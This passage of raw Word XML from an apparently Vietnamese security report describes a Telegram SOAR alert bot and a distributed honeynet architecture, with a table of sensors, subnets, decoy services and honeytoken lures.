          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>• Giao diện Cảnh báo Trực quan: Thay vì gửi văn bản thô, Bot xuất bản các Thẻ Cảnh báo (Incident Cards) định dạng HTML chuyên nghiệp với icon mức độ nguy hại, thông tin chi tiết về kẻ tấn công, mã kỹ thuật MITRE ATT&amp;CK và kết quả trinh sát nhanh.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>• Bàn phím Hành động Tức thì (Inline Keyboard Actions): Mỗi thông báo sự cố đều đi kèm một cụm 4 nút bấm tương tác:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">  - [🔍 Trinh sát ngược OSINT]: Kích hoạt lệnh quét sâu và gửi lại báo cáo tình báo chi tiết về IP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">  - [⛔ Chặn Firewall tức thì]: Ra lệnh cho SOAR Enforcer khóa IP trên Tường lửa ngay lập tức.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">  - [⏳ Đưa vào Tarpit]: Điều hướng IP vào hố nhựa đường Tarpit để làm tiêu hao tài nguyên đối phương.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">  - [🔓 Mở khóa IP]: Giải phóng IP khỏi danh sách chặn nếu xác định đây là kết nối nhầm lẫn hợp lệ.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Cơ chế này giúp chuyên viên SOC có thể điều hành tác chiến từ bất kỳ đâu thông qua điện thoại thông minh mà không cần phải mở máy tính và đăng nhập vào máy chủ.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="80" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5303520" cy="3447288"/>
            <wp:docPr id="7" name="Picture 7"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="hinh_3_4_telegram_bot_interface.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5303520" cy="3447288"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="160" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Hình 3.4: Giao diện Thẻ cảnh báo và Bàn phím tương tác Inline Buttons của Telegram SOAR Bot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="142850"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>3.9 Thiết kế Kiến trúc Mạng Bẫy Mồi Phân tán (Distributed Honeynet Architecture)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Trong môi trường hạ tầng mạng doanh nghiệp hiện đại hoặc mô hình điện toán đám mây lai (Hybrid Cloud), việc triển khai Honeypot đơn điểm (Single Honeypot Instance) bộc lộ hạn chế lớn về tầm nhìn chiến thuật (tactical visibility). Nếu chỉ đặt bẫy tại một địa chỉ IP duy nhất, hệ thống không thể giám sát được các kỹ thuật di chuyển ngang (Lateral Movement) hoặc hoạt động dò quét trinh sát phân tán (Cross-Subnet Probing). Nhằm khắc phục triệt để rào cản này, kiến trúc Honeynet Phân tán (Distributed Honeynet Architecture) được thiết kế và tích hợp trực tiếp vào nhân điều phối.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Mô hình bao gồm các thành phần cốt lõi được chuẩn hóa theo chuẩn kiến trúc mở:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1. Cụm Cảm biến Biên Đa phân vùng (Distributed Edge Sensor Nodes): Các tác tử cảm biến (Sensor Agents) được phân bổ tại các vị trí nhạy cảm trong hệ thống mạng, bao gồm phân vùng DMZ công khai, phân vùng Đám mây AWS VPC và phân vùng Mạng nội bộ Doanh nghiệp (Corporate LAN). Mỗi cảm biến được định danh duy nhất (node_id) và gán nhãn phân vùng mạng (subnet tag).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2. Giao thức Truyền tin &amp; Xác thực Biên an toàn (Secure REST Ingestion Protocol): Toàn bộ dữ liệu nhật ký sự kiện và trạng thái sức khỏe từ các Cảm biến Biên được gửi về Máy chủ Thu thập Trung tâm (Collector Server) thông qua giao thức HTTPS REST API tại cổng 9090. Kênh giao tiếp được bảo vệ nghiêm ngặt bằng Header xác thực 'X-Honeynet-Token' với cơ chế so khớp băm an toàn hmac.compare_digest(), ngăn chặn hoàn toàn nguy cơ giả mạo cảm biến (Sensor Spoofing).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3. Cơ chế Giám sát Sức khỏe &amp; Chống mất mát Dữ liệu (Heartbeat &amp; Resiliency): Các cảm biến duy trì nhịp tim (Heartbeat) định kỳ 30 giây gửi về Collector. Nếu một cảm biến mất kết nối quá thời gian quy định, hệ thống tự động ghi nhận trạng thái OFFLINE và gửi thông báo cảnh báo về SOC. Phía cảm biến hỗ trợ hàng đợi đệm (Event Buffer Queue) giúp lưu trữ tạm thời sự kiện khi mạng gián đoạn và tự động đồng bộ lại khi kết nối phục hồi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>4. Thuật toán Tương quan Dò quét Xuyên Phân vùng (Cross-Subnet Probing Correlation): Khi một địa chỉ IP nguồn thực hiện dò quét hoặc tương tác với từ 2 phân vùng mạng khác nhau trở lên, Correlation Engine lập tức kích hoạt Luật tương quan đặc biệt 'ALT-DISTRIB' tương ứng với Kỹ thuật MITRE ATT&amp;CK T1046 (Network Service Discovery: Distributed Multi-Node Scanning), tự động cộng dồn +35 điểm rủi ro và kích hoạt Playbook ngăn chặn đồng loạt trên toàn bộ các tường lửa biên.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="80" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5669280" cy="3472434"/>
            <wp:docPr id="8" name="Picture 8"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="so_do_honeynet_phan_tan_bw.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5669280" cy="3472434"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="160" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Hình 3.5: Sơ đồ Kiến trúc Mạng Bẫy Mồi Phân tán (Distributed Honeynet Cluster Architecture)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="80" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="003366"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Bảng 3.2: Danh mục Phân bổ Cảm biến Biên và Chiến lược Mồi nhử trong Cụm Honeynet Phân tán</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:left w:val="none"/>
          <w:right w:val="none"/>
          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:top w:w="120" w:type="dxa"/>
          <w:bottom w:w="120" w:type="dxa"/>
          <w:left w:w="160" w:type="dxa"/>
          <w:right w:w="160" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1881"/>
        <w:gridCol w:w="1881"/>
        <w:gridCol w:w="1881"/>
        <w:gridCol w:w="1881"/>
        <w:gridCol w:w="1881"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Mã Node Cảm biến</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Phân vùng Triển khai</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Dải mạng Subnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Dịch vụ Bẫy mồi Hoạt động</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Loại Mồi nhử Honeytoken</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>sensor-dmz-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>DMZ Public Web</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>192.168.10.0/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Cowrie SSH (Port 2222) + HTTP Canary (8080)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>/root/.bash_history, db_backup.sql</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>sensor-cloud-aws-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>AWS Cloud VPC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>10.0.1.0/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Decoy SSH Shell + Fake Cloud Admin Portal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>/root/.aws/credentials (AWS Canary IAM)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>sensor-internal-lan-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Corporate Internal LAN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>172.16.0.0/16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Decoy Lateral Port + Fake SMB File Share</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Active Directory Decoy Admin SPN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
